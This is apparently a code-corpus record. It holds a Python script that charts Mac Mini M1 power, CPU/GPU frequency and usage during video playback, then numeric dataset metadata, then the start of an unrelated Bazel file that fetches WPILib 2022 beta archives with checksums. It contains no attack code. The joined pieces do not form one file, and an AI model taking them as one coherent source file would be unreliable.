font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Usage over Time</b> <br> <sup> Apple Mac Mini M1 | YouTube VP9 4K SDR | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 50, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1.05, y=1.3, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.125, y=1.19,
sizex=0.22, sizey=0.22,
xanchor="left", yanchor="bottom"
)
)
fig.write_html("outputs/plotly-usage-browser.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-usage-browser.svg")
# BAR CHART FOR Averages by component
barDf = (dfUsage.loc[dfUsage["Video Type"].isin(["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, x='Video Type', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark', orientation='v', hover_name = 'Video Type',
width = 700, height = 350, barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Usage (%)"},
category_orders={"Video Type": ["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"]})
fig.update_yaxes(title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', range=[0, 32], ticksuffix = "%")
fig.update_xaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{y:.0f} (%)', texttemplate='%{y:.0f} %', textfont= dict(size=8), width=[0.15, 0.15, 0.15, 0.15, 0.15])
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Usage</b> <br> <sup> Apple Mac Mini M1 | YouTube VP9 4K SDR | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 0, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Efficiency Cluster'], barDf['Performance Cluster'], barDf['GPU']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'outside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1, y=1.25, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.15,
sizex=0.18, sizey=0.18,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-usage-average-browser.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-usage-average-browser.svg")
def buildNetflixCharts(dfPower, dfFrequency, dfUsage, config, kLogo):
dfPower["Video Type"].replace({"Safari-Netflix-1080p":"Safari (H.265 1080p)", "Chrome-Netflix-720p":"Chrome (VP9 720p)"}, inplace=True)
dfFrequency["Video Type"].replace({"Safari-Netflix-1080p":"Safari (H.265 1080p)", "Chrome-Netflix-720p":"Chrome (VP9 720p)"}, inplace=True)
dfUsage["Video Type"].replace({"Safari-Netflix-1080p":"Safari (H.265 1080p)", "Chrome-Netflix-720p":"Chrome (VP9 720p)"}, inplace=True)
# Figure for Package Power Over Time
fig = px.line(dfPower.loc[dfPower["Video Type"].isin(["Safari (H.265 1080p)", "Chrome (VP9 720p)"])], x='time', y=['Package'], template='plotly_dark',
width = 700, height = 350,
color='Video Type', line_shape= "spline", render_mode = "svg",
# color_discrete_sequence = px.colors.qualitative.G10,
color_discrete_map={
"Safari (H.265 1080p)": "#19C0FC",
"Chrome (VP9 720p)": "#FAD108"
},
labels={"value": "Power Consumption (mW)", "time": "Time (s)"})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=11)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_xaxes(showgrid=False, title_font = dict(size=10), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
fig.update_traces(hovertemplate='%{y} (mW)', line_smoothing = 1.3)
fig.update_layout(autosize = True, hovermode="x", legend_title_text='',
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5), font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Total Package Power Consumption over Time</b> <br> <sup> Apple Mac Mini M1 | Netflix Queen's Gambit | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 50, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1.05, y=1.1, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.125, y=1.18,
sizex=0.21, sizey=0.21,
xanchor="left", yanchor="bottom"
)
)
fig.write_html("outputs/plotly-power-package-netflix.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-package-netflix.svg")
# Figure for Total Power Over Time
fig = px.line(dfPower.loc[dfPower["Video Type"].isin(['Safari (H.265 1080p)', "Chrome (VP9 720p)"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'DRAM', 'GPU', 'Other'], template='plotly_dark',
width = 700, height = 500, facet_row='Video Type', line_shape= "spline", render_mode = "svg",
# color_discrete_sequence = px.colors.qualitative.G10,
# color_discrete_sequence=px.colors.sequential.YlOrRd,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Power Consumption (mW)", "time": "Time (s)"},
category_orders={"Video Type": ['Safari (H.265 1080p)', "Chrome (VP9 720p)"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
# print(annotation)
annotation['textangle'] = 0
annotation['xanchor'] = 'right'
annotation['x'] = annotation['x'] - 0.002
annotation['y'] = annotation['y'] + 0.088
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=13)
fig.update_yaxes(type='linear', title_font = dict(size=10), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_xaxes(showgrid=False, title_font = dict(size=11), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
# fig.update_traces(hovertemplate='%{y} (mW)', line_smoothing = 1.3)
fig.update_traces(hovertemplate='%{y} (mW)')
fig.update_layout(legend_title_text='', autosize = True, hovermode="x",
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Power Consumption over Time</b> <br> <sup> Apple Mac Mini M1 | Netflix Queen's Gambit | MacOS 11.2.2 </sup>",
'y':0.94,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'left', yanchor = 'top',
x=0.8, y=-0.1, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.09,
sizex=0.12, sizey=0.12,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-total-netflix.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-total-netflix.svg")
# BAR CHART FOR Averages by component
barDf = (dfPower.loc[dfPower["Video Type"].isin(["Safari (H.265 1080p)", "Chrome (VP9 720p)"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, x='Video Type', y=['Efficiency Cluster', 'Performance Cluster', 'DRAM', 'GPU', 'Other'], template='plotly_dark', orientation='v', hover_name = 'Video Type',
width = 700, height = 400, barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Power Consumption (mW)"},
category_orders={"Video Type": ["Safari (H.265 1080p)", "Chrome (VP9 720p)"]})
fig.update_yaxes(title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', range=[0, 65])
fig.update_xaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{y:.0f} (mW)', texttemplate='%{y:.0f}', textfont= dict(size=8), width=[0.11, 0.11, 0.11, 0.11, 0.11])
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Power Consumption</b> <br> <sup> Apple Mac Mini M1 | Netflix Queen's Gambit | MacOS 11.2.2 </sup>",
'y':0.93,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 0, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Efficiency Cluster'], barDf['Performance Cluster'], barDf['DRAM'], barDf['GPU'], barDf['Other']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'outside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=0.99, y=0.9, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.12,
sizex=0.145, sizey=0.145,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-average-netflix.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-average-netflix.svg")
# HORIZONTAL BAR CHART FOR Total Average
barDf = (dfPower.loc[dfPower["Video Type"].isin(["Safari (H.265 1080p)", "Chrome (VP9 720p)"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, y='Video Type', x=['Package'], template='plotly_dark', orientation='h', hover_name = 'Video Type', width = 700, height = 200, #barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={"Package": "#57FFBC"},
# color_discrete_map={
# "Efficiency Cluster": "#9D788C",
# "Performance Cluster": "#2A9D8F",
# "DRAM": "#E9C46A",
# "GPU": "#F4A261",
# # "Other": "rgb(95, 70, 144)"
# "Other": "#E76F51"
# },
labels={"value": "Power Consumption (mW)"},
category_orders={"Video Type": ["Safari-HW", "Chrome-HW", "Chrome-SW", "VLC-SW"]})
fig.update_xaxes(zeroline = True, title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_yaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{x:.0f} (mW)', texttemplate='%{x:.0f} mW', textfont= dict(size=11))
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
showlegend = False, font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Power Consumption</b> <br> <sup> Apple Mac Mini M1 | Netflix Queen's Gambit | MacOS 11.2.2 </sup>",
'y':0.87,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 15, t = 60),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Package']]
for i, t in enumerate(texts):
print('i = ', i,'t= ' ,t)
fig.data[i].text = t
fig.data[i].textposition = 'inside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1.02, y=1.5, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.27, y=1.16,
sizex=0.49, sizey=0.49,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-average-total-netflix.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-average-total-netflix.svg")
# Figure for CPU, GPU Frequency over time
fig = px.line(dfFrequency.loc[dfFrequency["Video Type"].isin(["Safari (H.265 1080p)", "Chrome (VP9 720p)"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark',
width = 700, height = 350, facet_col='Video Type', line_shape= "spline", render_mode = "svg", facet_col_wrap = 5,
# color_discrete_sequence = px.colors.qualitative.G10,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Frequency (MHz)", "time": "Time (s)"},
category_orders={"Video Type": ["Safari (H.265 1080p)", "Chrome (VP9 720p)"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=11)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_xaxes(showgrid=False, title_font = dict(size=10), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
fig.update_traces(hovertemplate='%{y} MHz', line_smoothing = 1.3)
fig.update_layout(legend_title_text='', autosize = True, hovermode="x",
legend=dict(orientation="h", yanchor="top", y=-0.3, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Frequency over Time</b> <br> <sup> Apple Mac Mini M1 | Netflix Queen's Gambit | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 50, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1.05, y=1.3, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.125, y=1.19,
sizex=0.22, sizey=0.22,
xanchor="left", yanchor="bottom"
)
)
fig.write_html("outputs/plotly-frequency-netflix.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-frequency-netflix.svg")
# Average Frequency
barDf = (dfFrequency.loc[dfFrequency["Video Type"].isin(["Safari (H.265 1080p)", "Chrome (VP9 720p)"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, x='Video Type', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark', orientation='v', hover_name = 'Video Type',
width = 700, height = 350, barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Frequency (MHz)"},
category_orders={"Video Type": ["Safari (H.265 1080p)", "Chrome (VP9 720p)"]})
fig.update_yaxes(title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', range=[0, 1250])
fig.update_xaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{y:.0f} (Hz)', texttemplate='%{y:.0f}', textfont= dict(size=8), width=[0.15, 0.15, 0.15, 0.15, 0.15])
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Frequency</b> <br> <sup> Apple Mac Mini M1 | Netflix Queen's Gambit | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 0, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Efficiency Cluster'], barDf['Performance Cluster'], barDf['GPU']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'outside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=0.99, y=1.25, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.15,
sizex=0.18, sizey=0.18,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-frequency-average-netflix.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-frequency-average-netflix.svg")
# Figure for CPU, GPU Usage over time
fig = px.line(dfUsage.loc[dfUsage["Video Type"].isin(["Safari (H.265 1080p)", "Chrome (VP9 720p)"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark',
width = 700, height = 350, facet_col='Video Type', line_shape= "spline", render_mode = "svg", facet_col_wrap = 5,
# color_discrete_sequence = px.colors.qualitative.G10,
# color_discrete_sequence= px.colors.sequential.Burgyl,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Usage (%)", "time": "Time (s)"},
category_orders={"Video Type": ["Safari (H.265 1080p)", "Chrome (VP9 720p)"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=11)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', ticksuffix = "%")
fig.update_xaxes(showgrid=False, title_font = dict(size=10), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
fig.update_traces(hovertemplate='%{y:.0f} %', line_smoothing = 1.3)
fig.update_layout(legend_title_text='', autosize = True, hovermode="x",
legend=dict(orientation="h", yanchor="top", y=-0.3, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Usage over Time</b> <br> <sup> Apple Mac Mini M1 | Netflix Queen's Gambit | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 50, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1.05, y=1.3, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.125, y=1.19,
sizex=0.22, sizey=0.22,
xanchor="left", yanchor="bottom"
)
)
fig.write_html("outputs/plotly-usage-netflix.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-usage-netflix.svg")
# BAR CHART FOR Averages by component
barDf = (dfUsage.loc[dfUsage["Video Type"].isin(["Safari (H.265 1080p)", "Chrome (VP9 720p)"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, x='Video Type', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark', orientation='v', hover_name = 'Video Type',
width = 700, height = 350, barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Usage (%)"},
category_orders={"Video Type": ["Safari (H.265 1080p)", "Chrome (VP9 720p)"]})
fig.update_yaxes(title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', range=[0, 20], ticksuffix = "%")
fig.update_xaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{y:.0f} (%)', texttemplate='%{y:.0f} %', textfont= dict(size=8), width=[0.15, 0.15, 0.15, 0.15, 0.15])
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Usage</b> <br> <sup> Apple Mac Mini M1 | Netflix Queen's Gambit | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 0, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Efficiency Cluster'], barDf['Performance Cluster'], barDf['GPU']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'outside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1, y=1.25, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.15,
sizex=0.18, sizey=0.18,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-usage-average-netflix.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-usage-average-netflix.svg")
def outputExcel(dfPower, dfFrequency, dfUsage):
# create excel writer object
writer = pd.ExcelWriter('outputs/output.xlsx')
# Write a different sheet for each dataframe
dfPower.to_excel(writer, sheet_name = 'power', freeze_panes=(1,1), index = False)
dfFrequency.to_excel(writer, sheet_name = 'frequency', freeze_panes=(1,1), index = False)
dfUsage.to_excel(writer, sheet_name = 'usage', freeze_panes=(1,1), index = False)
print("Exporting Excel file...")
writer.save()
def main():
start_time = time.time()
print("Starting at = ", time.ctime(start_time))
directory_path = os.getcwd()
# Current directory should have a folder named powermetric-logs which contains the output logs of powermetric runs
powerLogsFolderName = "powermetric-logs"
# Build the full path to the logs folder
pathLogsFolder = directory_path + '/' + powerLogsFolderName + '/'
# Get the list of all log files in the logs folder
powerLogsList = os.listdir(pathLogsFolder)
# Create local dataframes
dfPower, dfFrequency, dfUsage = pd.DataFrame(), pd.DataFrame(), pd.DataFrame()
# Parse each log file
for logsFile in powerLogsList:
if not os.path.isfile(pathLogsFolder + logsFile):
print('File does not exist.')
else:
file = open(pathLogsFolder + logsFile, 'r', encoding="utf8", errors='ignore')
content = file.read()
if (logsFile.find('mp4') >= 0) or (logsFile.find('webm') >= 0):
# Transform 4K-AV1.mp4.txt -> 4K-AV1 because that's what we want in the charts
f_name = os.path.splitext(logsFile)[0]
videoType = str.split(f_name, '.')[0]
else:
# Used for file paths like Safari-VP9-HW.txt i.e. without the video container (mp4, webm)
videoType = os.path.splitext(logsFile)[0]
# Parse the content and build Data Frames
dfPowerTemp, dfFrequencyTemp, dfUsageTemp = regexParse(content, videoType)
dfPower = pd.concat([dfPower, dfPowerTemp], ignore_index=True)
dfFrequency = pd.concat([dfFrequency, dfFrequencyTemp], ignore_index=True)
dfUsage = pd.concat([dfUsage, dfUsageTemp], ignore_index=True)
# Common Plotly config parameter to be passed to each chart
config = dict({
'modeBarButtonsToRemove': ['toggleSpikelines', 'hoverClosestCartesian', 'hoverCompareCartesian', 'select2d', 'lasso2d'],
'displaylogo': False
})
# Logo file to add to the charts
kLogo = Image.open("favicon-97x98-white.png")
# Build charts and output the Excel file
buildVLCCharts(dfPower, dfFrequency, dfUsage, config, kLogo)
buildYouTubeCharts(dfPower, dfFrequency, dfUsage, config, kLogo)
buildNetflixCharts(dfPower, dfFrequency, dfUsage, config, kLogo)
outputExcel(dfPower, dfFrequency, dfUsage)
#print(dfPower)
end_time = time.time()
print("Ending at = ", time.ctime(end_time))
print(f"It took {end_time-start_time:.2f} Time (s) to compute")
if __name__ == "__main__":
main()
| 48.573148
| 222
| 0.596464
| 9,782
| 76,697
| 4.589654
| 0.053363
| 0.025481
| 0.022185
| 0.019645
| 0.918367
| 0.911997
| 0.899457
| 0.89616
| 0.887518
| 0.882194
| 0
| 0.06058
| 0.219383
| 76,697
| 1,579
| 223
| 48.573148
| 0.689299
| 0.094241
| 0
| 0.740924
| 0
| 0.019802
| 0.272563
| 0.032125
| 0
| 0
| 0
| 0.000633
| 0
| 1
| 0.004951
| false
| 0
| 0.010726
| 0
| 0.016502
| 0.006601
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ca5ba567a759b2c0b706aadfdf0362dacff6069d
| 51,664
|
bzl
|
Python
|
bazelrio/dependencies/wpilib/2022_1_1_beta_1/deps.bzl
|
noamzaks/bazelrio
|
1684b66865e655fc0f3832f0e3602e905a1d4035
|
[
"MIT"
] | 5
|
2021-09-26T01:16:26.000Z
|
2022-03-18T17:21:23.000Z
|
bazelrio/dependencies/wpilib/2022_1_1_beta_1/deps.bzl
|
noamzaks/bazelrio
|
1684b66865e655fc0f3832f0e3602e905a1d4035
|
[
"MIT"
] | 59
|
2021-09-23T04:19:33.000Z
|
2022-03-29T07:47:10.000Z
|
bazelrio/dependencies/wpilib/2022_1_1_beta_1/deps.bzl
|
noamzaks/bazelrio
|
1684b66865e655fc0f3832f0e3602e905a1d4035
|
[
"MIT"
] | 2
|
2021-11-18T10:34:16.000Z
|
2021-11-21T06:15:07.000Z
|
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive", "http_jar")
load("@bazel_tools//tools/build_defs/repo:jvm.bzl", "jvm_maven_import_external")
load("@bazel_tools//tools/build_defs/repo:utils.bzl", "maybe")
load("@bazelrio//:deps_utils.bzl", "cc_library_headers", "cc_library_shared", "cc_library_sources", "cc_library_static")
def setup_wpilib_2022_1_1_beta_1_dependencies():
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "c926798f365dcb52f8da4b3aa16d2b712a0b180e71990dab9013c53cb51ec8c9",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "134d58c2d76ee9fc57f2e8c69b3f937175d98b9f33cd7b2f11504f2b16ca57a0",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "634688e85581e4067213b8578b8f1368aada728e2f894f7ac0460e60390dc3a6",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
